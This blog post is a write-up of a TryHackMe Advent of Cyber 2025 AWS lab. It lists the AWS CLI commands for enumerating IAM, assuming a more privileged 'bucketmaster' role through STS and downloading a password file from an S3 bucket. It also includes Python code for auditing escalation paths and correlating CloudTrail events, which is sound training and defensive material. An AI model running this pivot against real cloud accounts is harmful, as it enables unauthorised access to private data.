AWS Cloud TryHackMe Beginner

TryHackMe Advent of Cyber 2025 Day 23 | S3cret Santa

// published · 2025-12-23
overview

Day 23 of TryHackMe Advent of Cyber 2025 — a beginner-friendly AWS challenge that walks through a realistic cloud attack scenario. Starting from an IAM user with limited permissions, we enumerate the environment, discover an assumable role with broader access, pivot into it using STS AssumeRole, and ultimately reach sensitive data stored in an S3 bucket. A solid introduction to AWS privilege escalation through IAM misconfigurations.

what you'll learn
IAM fundamentals: users, roles, groups, policies (inline vs managed)
STS AssumeRole: pivoting from one IAM identity to another
S3 enumeration: listing buckets, objects, and retrieving files
AWS CLI basics: profile setup, credential export, identity checks
commands used
verify current identity

```bash
# always start here: confirms which account, user, and ARN you're operating as
aws sts get-caller-identity
```
enumerate iam users

```bash
# list all IAM users in the account; note usernames for further enumeration
aws iam list-users
```
enumerate user's groups and policies

```bash
# find which groups the user belongs to; groups can carry permissions of their own
aws iam list-groups-for-user --user-name sir.carrotbane

# list-user-policies = inline policies (embedded directly on the user)
aws iam list-user-policies --user-name sir.carrotbane

# list-attached-user-policies = managed policies (reusable, attached from outside)
aws iam list-attached-user-policies --user-name sir.carrotbane
```
read the inline policy document

```bash
# retrieves the full JSON policy; look for sts:AssumeRole permissions,
# that's the key to pivoting to a more privileged identity
aws iam get-user-policy \
  --policy-name SirCarrotbanePolicy \
  --user-name sir.carrotbane
```
enumerate iam roles and target role policies

```bash
# list all roles; look for assumable roles with interesting names or permissions
aws iam list-roles

# enumerate inline and managed policies on the target role
aws iam list-role-policies --role-name bucketmaster
aws iam list-attached-role-policies --role-name bucketmaster

# read the full policy; confirm this role has S3 access before assuming it
aws iam get-role-policy \
  --role-name bucketmaster \
  --policy-name BucketMasterPolicy
```
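The two policy reads above are the whole story of the misconfiguration: the user's inline policy must allow sts:AssumeRole on the role ARN, and the role's trust policy must accept that principal, and only then does the role's permission policy become reachable. The following is an added example, not code from the room or from TryHackMe, that performs that check statically over policy documents so a defender can spot such chains before anyone exercises them. The policy JSON, the second role (deploy-admin), the ci-runner principal and the account ID 123456789012 are all constructed for the example; the bucket, user and role names mirror the scenario.

```python
"""Static audit: which roles can an IAM user reach, and what do they gain?"""
import fnmatch

# Constructed policy documents modelled on the scenario (not the room's real data).
ACCOUNT = "123456789012"
USER_ARN = f"arn:aws:iam::{ACCOUNT}:user/sir.carrotbane"
USER_POLICIES = {
    "SirCarrotbanePolicy": {"Statement": [
        {"Effect": "Allow", "Action": ["iam:List*", "iam:Get*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "sts:AssumeRole",
         "Resource": [f"arn:aws:iam::{ACCOUNT}:role/bucketmaster",
                      f"arn:aws:iam::{ACCOUNT}:role/deploy-admin"]},
    ]},
}
ROLES = {
    # Trusts the account root, so any principal in the account whose own
    # identity policy grants sts:AssumeRole on this ARN can assume it.
    f"arn:aws:iam::{ACCOUNT}:role/bucketmaster": {
        "Trust": {"Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
                                 "Principal": {"AWS": f"arn:aws:iam::{ACCOUNT}:root"}}]},
        "Policies": {"BucketMasterPolicy": {"Statement": [
            {"Effect": "Allow", "Action": ["s3:ListBucket", "s3:GetObject"],
             "Resource": ["arn:aws:s3:::easter-secrets-123145",
                          "arn:aws:s3:::easter-secrets-123145/*"]}]}},
    },
    # Constructed role whose trust policy names one specific principal; the
    # user's identity policy alone is not enough to assume it.
    f"arn:aws:iam::{ACCOUNT}:role/deploy-admin": {
        "Trust": {"Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
                                 "Principal": {"AWS": f"arn:aws:iam::{ACCOUNT}:role/ci-runner"}}]},
        "Policies": {"DeployAdmin": {"Statement": [
            {"Effect": "Allow", "Action": "s3:*", "Resource": "*"}]}},
    },
}
# Concrete actions worth flagging when they become reachable through a role.
SENSITIVE = ("s3:GetObject", "s3:ListBucket", "s3:PutObject", "iam:PassRole")


def _as_list(v):
    return v if isinstance(v, list) else [v]


def allow_statements(policy):
    return [s for s in _as_list(policy.get("Statement", [])) if s.get("Effect") == "Allow"]


def action_matches(pattern, action):
    # IAM action matching is case-insensitive and supports '*' wildcards.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def assumable_by_identity_policy(user_policies, roles):
    """Role ARNs the user's own policies allow sts:AssumeRole on (step 1 of 2)."""
    found = set()
    for pol in user_policies.values():
        for st in allow_statements(pol):
            if not any(action_matches(a, "sts:AssumeRole") for a in _as_list(st.get("Action", []))):
                continue
            for role_arn in roles:
                if any(fnmatch.fnmatchcase(role_arn, r) for r in _as_list(st.get("Resource", []))):
                    found.add(role_arn)
    return sorted(found)


def trust_allows(role, principal_arn):
    """Does the role's trust policy accept this principal? (step 2 of 2)"""
    account = principal_arn.split(":")[4]
    for st in allow_statements(role["Trust"]):
        if not any(action_matches(a, "sts:AssumeRole") for a in _as_list(st.get("Action", []))):
            continue
        principal = st.get("Principal", {})
        if principal == "*":
            return True
        for p in _as_list(principal.get("AWS", [])):
            if p in ("*", principal_arn, account, f"arn:aws:iam::{account}:root"):
                return True
    return False


def escalation_paths(user_arn, user_policies, roles, sensitive=SENSITIVE):
    """List roles the user can actually assume and the sensitive actions gained."""
    paths = []
    for role_arn in assumable_by_identity_policy(user_policies, roles):
        role = roles[role_arn]
        if not trust_allows(role, user_arn):
            continue
        gained = set()
        for pol in role["Policies"].values():
            for st in allow_statements(pol):
                for pattern in _as_list(st.get("Action", [])):
                    gained.update(s for s in sensitive if action_matches(pattern, s))
        if gained:
            paths.append({"role": role_arn, "actions": sorted(gained)})
    return paths


if __name__ == "__main__":
    for path in escalation_paths(USER_ARN, USER_POLICIES, ROLES):
        print(f"{USER_ARN} -> {path['role']}: {', '.join(path['actions'])}")
```

The audit deliberately checks both halves of the permission: deploy-admin drops out even though the user's policy names it, because its trust policy does not accept the user, while bucketmaster is reachable through the account-root trust. Role-to-role chaining (a reached role assuming further roles) is not followed here; extending the loop to recurse over each reached role's own policies is the natural next step.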
assume the role: pivot to bucketmaster

```bash
# AssumeRole returns temporary credentials: AccessKeyId, SecretAccessKey, SessionToken
# replace the account ID in the ARN with the actual account ID from your environment
aws sts assume-role \
  --role-arn arn:aws:iam::123456789012:role/bucketmaster \
  --role-session-name scb-bm
```
export temporary credentials

```bash
# paste the values from the assume-role output above
# once exported, all subsequent aws commands run as bucketmaster
export AWS_ACCESS_KEY_ID="ASIA********"
export AWS_SECRET_ACCESS_KEY="tAcT2P****"
export AWS_SESSION_TOKEN="FQoGZXIvYXd********g6WqA="
```
verify new identity and access s3

```bash
# confirm you're now operating as bucketmaster
aws sts get-caller-identity

# list all accessible buckets under the new role
aws s3api list-buckets

# enumerate objects inside the target bucket
aws s3api list-objects --bucket easter-secrets-123145

# download the file: --key is the object path, the last argument is the local filename
aws s3api get-object \
  --bucket easter-secrets-123145 \
  --key cloud_password.txt \
  cloud_password.txt

# verify the file downloaded and read its contents
ls
cat cloud_password.txt
```
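Every step of this pivot leaves a trail: the AssumeRole call is logged by CloudTrail with the temporary AccessKeyId it issued, and every later S3 call made with that key carries the same AccessKeyId in its userIdentity block. The following is an added example, not from the room or from TryHackMe, showing how a detection can tie the two together and report which original user ended up reading which object through which role. The event records are constructed to resemble CloudTrail's shape for this scenario (the timestamps, the ASIAEXAMPLE1 / AKIAEXAMPLE2 key IDs, the backup-svc user and the account ID 123456789012 are all made up); note that S3 object-level events such as GetObject only appear in CloudTrail when data-event logging is enabled for the bucket or trail.

```python
"""Correlate CloudTrail AssumeRole events with later S3 data events on the same key."""
from datetime import datetime, timedelta

# Constructed CloudTrail records mirroring the scenario's sequence of calls.
CONSTRUCTED_EVENTS = [
    {"eventTime": "2025-12-23T10:00:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "AssumeRole",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/sir.carrotbane",
                      "accessKeyId": "AKIAEXAMPLE0"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/bucketmaster",
                           "roleSessionName": "scb-bm"},
     "responseElements": {"credentials": {"accessKeyId": "ASIAEXAMPLE1"}}},
    {"eventTime": "2025-12-23T10:00:05Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity",
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLE1",
                      "arn": "arn:aws:sts::123456789012:assumed-role/bucketmaster/scb-bm"}},
    {"eventTime": "2025-12-23T10:00:10Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets",
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLE1",
                      "arn": "arn:aws:sts::123456789012:assumed-role/bucketmaster/scb-bm"}},
    {"eventTime": "2025-12-23T10:00:20Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject",
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLE1",
                      "arn": "arn:aws:sts::123456789012:assumed-role/bucketmaster/scb-bm"},
     "requestParameters": {"bucketName": "easter-secrets-123145", "key": "cloud_password.txt"}},
    # A direct read with a long-term key that never came from AssumeRole: not a pivot.
    {"eventTime": "2025-12-23T10:05:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject",
     "userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAEXAMPLE2",
                      "arn": "arn:aws:iam::123456789012:user/backup-svc"},
     "requestParameters": {"bucketName": "backups-123145", "key": "nightly.tar"}},
]

S3_DATA_ACTIONS = ("GetObject", "PutObject", "DeleteObject")


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def correlate_assume_role_to_s3(events, window=timedelta(hours=1), actions=S3_DATA_ACTIONS):
    """Return one alert per S3 data event made with credentials minted by AssumeRole."""
    sessions = {}  # temporary access key id -> who assumed which role, and when
    alerts = []
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        if ev["eventSource"] == "sts.amazonaws.com" and ev["eventName"] == "AssumeRole":
            key = ev.get("responseElements", {}).get("credentials", {}).get("accessKeyId")
            if key:  # a denied AssumeRole has no responseElements and is skipped
                sessions[key] = {"source_user": ev["userIdentity"]["arn"],
                                 "role": ev["requestParameters"]["roleArn"],
                                 "time": parse_time(ev["eventTime"])}
        elif ev["eventSource"] == "s3.amazonaws.com" and ev["eventName"] in actions:
            sess = sessions.get(ev["userIdentity"].get("accessKeyId"))
            if sess and parse_time(ev["eventTime"]) - sess["time"] <= window:
                params = ev.get("requestParameters", {})
                alerts.append({"source_user": sess["source_user"], "role": sess["role"],
                               "action": ev["eventName"], "bucket": params.get("bucketName"),
                               "object": params.get("key"), "time": ev["eventTime"]})
    return alerts


if __name__ == "__main__":
    for a in correlate_assume_role_to_s3(CONSTRUCTED_EVENTS):
        print(f"{a['time']} {a['source_user']} via {a['role']} "
              f"{a['action']} s3://{a['bucket']}/{a['object']}")
```

Keying the correlation on the issued AccessKeyId rather than on the session name is what makes the attribution reliable: the session name is chosen by the caller, but the key is chosen by STS and appears verbatim on every subsequent call. The same join is what lets you answer the question an incident responder actually asks, namely which human or service credential was behind a read performed by a role.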